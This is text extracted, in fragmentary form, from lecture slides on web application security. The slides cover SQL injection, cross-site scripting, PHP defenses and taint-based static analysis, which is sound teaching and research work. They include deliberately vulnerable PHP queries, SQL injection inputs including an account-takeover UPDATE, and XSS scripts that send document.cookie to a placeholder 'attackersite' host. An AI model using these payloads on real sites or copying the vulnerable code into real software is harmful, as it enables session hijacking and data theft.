Presentation 14 PDF
Presentation 14 PDF
1
Interact with 2
the browser 3
Request for a Web page
Retrieve/generate
the page, possibly
Browser using data from
Delivery of the page in the database and
HTML + scripts adding client-side
scripts to enrich
User 4 functionalities
Display the
page and 5
execute client-
side scripts on
the page
Note: cookies or the equivalent are typically used for maintaining sessions.
2012/11/28 @ JST Analysis of Web Application Secuirty 5
Web Applications
Web applications refer mainly to the
application programs running on the server.
Part of a Web application may run on the client.
Together, they make the Web interactive,
convenient, and versatile.
Online activities enabled by Web applications:
Hotel/transportation reservation,
Banking, social networks, etc.
As such, Web applications often involve user’s
private and confidential data.
2012/11/28 @ JST Analysis of Web Application Secuirty 6
Web Applications: Dynamic Contents
<?
$link = mysql_connect(‘localhost’,‘username’,‘password’); // connect to
database
$db = mysql_select_db(‘dbname’,$link);
$user=$_POST[‘account’];
// fetch and display account information
$query="SELECT id, name, description FROM project WHERE
user_account=‘ ".$user.“ ‘ " ;
$query_result = mysql_query($query);
while ($result=mysql_fetch_row($query_result)) {
echo ‘<table>’;
echo ‘<tr>’;
echo ‘<td width=“100px”>’.$result[0].’</td>’;
echo ‘<td width=“100px”>’.$result[1].’</td>’;
echo ‘<td width=“100px”>’.$result[2].’</td>’;
echo ‘</tr>’;
echo ‘</table>’;
} @ JST
2012/11/28 Analysis of Web Application Secuirty 7
?>
Web Applications: Client-Side Script
<html>
<head>
<title>Example 2</title>
<script type=‘text/javascript’>
function submit_form(){
if(document.getElementById(‘user_account’).value!=“”){
document.getElementById(‘project_form’).submit();
}
}
</script>
</head>
<body>
<form id=‘project_form’ action=‘my_project.php’ method=‘POST’>
<input type=‘text’ name=‘user_account’ id=‘user_account’ />
<input type=‘button’ value=‘OK’ onclick=‘submit_form();’ />
<input type=‘reset’ value=‘Reset’ />
</form>
</body>
</html>
2012/11/28 @ JST Analysis of Web Application Secuirty 8
Vulnerable Web Applications
Many Web applications have security
vulnerabilities that may be exploited by the
attacker.
Most security vulnerabilities are a result of bad
programming practices or programming
errors.
The possible damages:
Your personal data get stolen.
Your website gets infected or sabotaged.
These may bare financial or legal consequences.
2012/11/28 @ JST Analysis of Web Application Secuirty 9
A Common Vulnerability: SQL Injection
User’s inputs are used as parts of an SQL query,
without being checked/validated.
Attackers may exploit the vulnerability to read,
update, create, or delete arbitrary data in the database.
Example (display all users’ information):
Relevant code in a vulnerable application:
$sql = “SELECT * FROM users WHERE id = ‘” . $_GET[‘id’] . “’”;
The attacker types in 0’ OR ‘1’ = ‘1 as the input for id.
The actual query executed:
SELECT * FROM users WHERE id = ‘0’ OR ‘1’ = ‘1’;
So, the attacker gets to see every row from the users
2012/11/28table.
@ JST Analysis of Web Application Secuirty 10
SQL Injection (cont.)
Vulnerable
Attacker User
Website
1. Send an HTTP request
with id = 1128
2. The server returns the
user data with id=1128
(SQL query:
SELECT * FROM user
WHERE id=‘1128’;)
1. Send an HTTP request with id = 0’ OR ‘1’=‘1
2. The server returns all tuples in the user table
(SELECT * FROM user WHERE id=‘0’ OR ‘1’=‘1’;)
message User aware of message User unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 11
Compromised Websites
Compromised legitimate websites can
introduce malware and scams.
Compromised sites of 2010 include
the European site of popular tech blog TechCrunch,
news outlets like the Jerusalem Post, and
local government websites like that of the U.K.’s
Somerset County Council.
30,000 new malicious URLs every day.
Source: Sophos security threat report 2011
2012/11/28 @ JST Analysis of Web Application Secuirty 12
Compromised Websites (cont.)
More than 70% of those URLs are legitimate
websites that have been hacked or
compromised.
Criminals gain access to the data on a
legitimate site and subvert it to their own ends.
They achieve this by
exploiting vulnerabilities in the software that
power the sites or
by stealing access credentials from malware‐
infected machines.
Source: Sophos security threat report 2011
2012/11/28 @ JST Analysis of Web Application Secuirty 13
Prevention
Properly configure the server
Use secure application interfaces
Validate (sanitize) all inputs from the user and
even the database
Apply detection/verification tools and repair
errors before deployment
Commercial tools
Free tools from research laboratories
Injection
Cross‐Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object Reference
Cross‐Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
$sql = “SELECT login_id, passwd, full_name, email
relevant code: FROM users
WHERE email = ‘” . $_GET[‘email’] . “’”;
The attacker may set things up to steal the account of
Bob ([email protected]) by fooling the server to
execute: SELECT login_id, passwd, full_name, email
FROM users
WHERE email = ‘x’;
UPDATE users
SET email = ‘[email protected]’
2012/11/28 @ JST Analysis of Web Application Secuirty
WHERE email = ‘[email protected]’; 18
Defenses against SQL Injection in PHP
Sources (where tainted data come from)
$_GET, $_POST, $_SERVER, $_COOKIE, $_FILE,
$_REQUEST, $_SESSION
Sinks (where tainted data should not be used)
mysql_query(), mysql_create_db(),
mysql_db_query (), mysql_drop_db(),
mysql_unbuffered_query()
Defenses
Parameter: magic_quotes_gpc
Built‐in function: addslashes
Prepared statements (for database accesses)
2012/11/28 @ JST Analysis of Web Application Secuirty 19
Defenses against SQL Injection (cont.)
Set the magic_quotes_gpc parameter on in the PHP
configuration file.
When the parameter is on, ' (single‐quote), " (double
quote), \ (backslash) and NULL characters are escaped
with a backslash automatically.
Built‐in function: addslashes( string $str )
The same effect as setting magic_quotes_gpc on
<?php
$str = "Is your name O‘Brien?";
echo addslashes($str);
// Output: Is your name O\‘Brien?
?>
To execute the above query, one needs to supply the
actual value for ? (which is called a placeholder).
The first argument of bind_param() is the input’s type:
i for int, s for string, d for double
2012/11/28 @ JST Analysis of Web Application Secuirty 21
Cross-Site Scripting (XSS)
The server sends unchecked/unvalidated data to
user’s browser.
Attackers may exploit the vulnerability to execute
client‐side scripts to:
Hijack user sessions
Deface websites
Conduct phishing attacks
Types of cross‐site scripting :
Stored XSS
Reflected XSS
1. Post a malicious message onto the bulletin board.
<script>document.location=
“http://attackersite/collect.cgi?cooki 2. Logon request
e=”
+ document.cookie;
</script> 3. Set‐Cookie: …
4. Read the bulletin board
5. Show the malicious script
6. The victim's browser runs the <script>document.location=
“http://attackersite/collect.cgi?cooki
script and transmits the cookie to e=”
the attacker. + document.cookie;
</script>
message Victim aware of message Victim unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 23
Reflected XSS
Vulnerable
Attacker Victim
Website
1. Logon request
2. Set‐Cookie: ID=A12345
3. Request by clicking unwittingly
a link to Attacker’s site
4.
<HTML> 5.
<a href=‘http://vulnerablesite/welcome.cgi? <HTML>
name=<script>window.open(%27http:// <a href=‘http://vulnerablesite/welcome.cgi?
attackersite/collect.cgi?cookie=%27%2Bdoc name=<script>window.open(%27http://
ument.cookie);</script>’>vulnerablesite</a attackersite/collect.cgi?cookie=%27%2Bdoc
> ument.cookie);</script>’>vulnerablesite</a
>
6.
<HTML>
7. <Title>Welcome!</Title>Hi
http://attackersite/collect.cgi?cookie=ID= <script>window.open(‘http://attackersite
A12345 /collect.cgi?cookie =’+document.cookie);
(cookie stolen by the attacker) </script>
message Victim aware of message Victim unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 24
Defenses against Cross-Site Scripting in PHP
Sources (assumption: the database is not tainted)
$_GET, $_POST, $_SERVER, $_COOKIE, $_FILE,
$_REQUEST, $_SESSION
More Sources (assumption: the database is tainted)
mysql_fetch_array(), mysql_fetch_field(),
mysql_fetch_object(), mysql_fetch_row(), …
Sinks
echo, printf, …
Defenses
htmlspecialchars()
htmlentities()
2012/11/28 @ JST Analysis of Web Application Secuirty 25
Defenses against Cross-Site Scripting (cont.)
Built‐in function: htmlspecialchars( string $str [, int
$quote_style = ENT_COMPAT])
Convert special characters to HTML entities
'&' (ampersand) becomes '&'
'"' (double quote) becomes '"' when
ENT_NOQUOTES is not set.
''' (single quote) becomes ''' only when
ENT_QUOTES is set.
'<' (less than) becomes '<'
'>' (greater than) becomes '>'
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new; // <a href='test'>Test</a>
?>
2012/11/28 @ JST Analysis of Web Application Secuirty 26
Defenses against Cross-Site Scripting (cont.)
Built‐in function: htmlentities( string $string [, int
$quote_style = ENT_COMPAT] )
the same effect with built‐in function:
htmlspecialchars()
<?php
$orig = "I'll \"walk\" the <b>dog</b> now";
$a = htmlentities($orig);
$b = html_entity_decode($a);
echo $a; // I'll "walk" the <b>dog</b>
now
echo $b; // I'll "walk" the <b>dog</b> now
?>
True False
$dept == 0
10: echo "Hello! ".$id; 14: echo "Hello! ".$dept.$id;
11: displayManagementFun(); 15: displayBasicFun();
Exit
2012/11/28 @ JST Analysis of Web Application Secuirty 31
Dependency Graph (1/3)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"]; $_POST["dept"], 3 $_POST["id"], 2
Untainted Tainted
05: echo "Hello! guest"; echo, 5
06: displayWelcomePage();
Untainted
Exit
$id == "admin"
str_concat, 10
True
10: echo "Hello! ".$id; Tainted
11: displayManagementFun();
echo, 10
Exit Tainted
Note: a better analysis would take into account $id == “admin”.
2012/11/28 @ JST Analysis of Web Application Secuirty 33
Dependency Graph (3/3)
02: $id = $_POST["id"]; $_POST["dept"], 3 $_POST["id"], 2
03: $dept = $_POST["dept"];
Tainted Tainted
14: echo "Hello! ".$dept.$id; str_concat, 14
15: displayBasicFun();
Tainted
echo, 14
Exit
Tainted
2012/11/28 @ JST Analysis of Web Application Secuirty 34
Alias
PHP code Dependency Graph
01 <?php
02 $a = "message"; $_GET["msg"], 4
03 $b = &$a;
04 $a= $_GET["msg"]; Tainted
05 echo $b;
$b, 3 $a, 4
06 ?>
Tainted Tainted
alias
echo, 5
Tainted
Alias Information
must‐alias{(a,b)}
All inputs from a source are considered tainted.
Data that depend on tainted data are also
considered tainted.
Some functions may be designated as
sanitization functions (for particular security
vulnerabilities).
Values returned from a sanitization function
are considered clean or untainted.
Report vulnerabilities when tainted values are
used in a sink.
2012/11/28 @ JST Analysis of Web Application Secuirty 36
Problems and Objectives
Four problems (among others) remain:
Existing code analysis tools report too many false
positives.
They rely on the programmer to ensure correctness
of sanitization functions.
Many tools report false negatives in some cases.
Web application languages/frameworks are
numerous and hard to catch up.
We aim to solve the first three problems and
alleviate the fourth.
2012/11/28 @ JST Analysis of Web Application Secuirty 37
Use of a Code Analysis Tool
Source code, Code analysis tool
Web pages Analysis results
Website Manual review
Note: fewer false positives means less workload for the human reviewer.
Note: there may be possible feedback loops between two tasks.
2012/11/28 @ JST Analysis of Web Application Secuirty 38
Challenges
Dynamic features of scripting languages
popular for Web application development:
Dynamic typing
Dynamic code generation and inclusion
Other difficult language features:
Aliases and hash tables
Strings and numerical quantities
Interactions between client‐side code, server‐
side code, databases, and system configurations
Variation in browser and server behaviors
2012/11/28 @ JST Analysis of Web Application Secuirty 39
Challenges: Alias Analysis
In PHP, aliases may be introduced by using the
reference operator “&”.
PHP Code PHP Code
<?php <?php
$a=“test”; // $a: untainted $a="test"; // $a: untainted
$b=&$a; // $a, $b: untainted $b=&$a; // $a, $b: untainted
$a= $_GET[“msg”]; // $a ,$b: tainted. grade();
echo $b; // XSS vulnerability function grade()
?> {
$a=$_GET["msg"]; // $a , $b: tainted.
}
echo $b; ?> // XSS vulnerability
To exploit the XSS vulnerability at line 8, we
have to generate input strings satisfying the
conditions at lines 1, 2, and 7, which involve
both string and numeric constraints.
2012/11/28 @ JST Analysis of Web Application Secuirty 42
Challenges: A Theoretical Limitation
Consider the class of programs with:
Assignment
Sequencing, conditional branch, goto
At least three string variables
String concatenation (or even just appending a
symbol to a string)
Equality testing between two string variables
The Reachability Problem for this class of
programs is undecidable.
Analysis Results
Parse Python
Parse PHP to C AST Parse … to C AST
to C AST
C Abstract Syntax Tree
Convert C AST to CIL
CIL Intermediate
Representation
Integrated Analysis Results
/* getStep.php <action>browse</action>
<target></target>
<typingString></typingString>
original code Uses the ajax /* </step>
/* verify.php
manipulate /*
the webpage verify
*/ */
2012/11/28 @ JST … Analysis of Web Application Secuirty 52
Outline
Introduction
Common Vulnerabilities and Defenses
Objectives and Challenges
Opportunities
Our Approach: CANTU
Conclusion
Generated Web Pages,” WWW 2005.
Xie and Aiken, “Static Detection of Security
Vulnerabilities in Scripting Languages,” USENIX
Security Symposium 2006.
Su and Wassermann, “The Essence of Command
Injection Attacks in Web Applications,” POPL 2006.
Chess and West, Secure Programming with Static
Analysis, Pearson Education, Inc. 2007.
2012/11/28 @ JST Analysis of Web Application Secuirty 55
Selected References (cont.)
Lam et al., “Securing Web Applications with Static
and Dynamic Information Flow Tracking,” PEPM
2008.
Yu et al., “Verification of String Manipulation
Programs Using MultiTrack Automata,” Tech
Report, UCSB, 2009.
Yu et al., “Generating Vulnerability Signatures for
String Manipulating Programs Using Automata
based Forward and Backward Symbolic Analyses,”
IEEE/ACM ICASE 2009.
Kiezun et al., “Automatic Creation of SQL Injection
and CrossSite Scripting Attacks,” ICSE
2012/11/28 @ JST Analysis of Web Application Secuirty 2009. 56
Selected References (cont.)
OWASP, http://www.owasp.org/.
The CVE Site, http://cve.mitre.org/.
C.‐P. Tai, An Integrated Environment for Analyzing Web
Application Security, Master’s Thesis, NTU, 2010.
R.‐Y. Yeh, An Improved Static Analyzer for Verifying PHP
Web Application Security, Master’s Thesis, NTU, 2010.
S.‐F. Yu, Automatic Generation of Penetration Test Cases
for Web Applications, Master’s Thesis, NTU, 2010.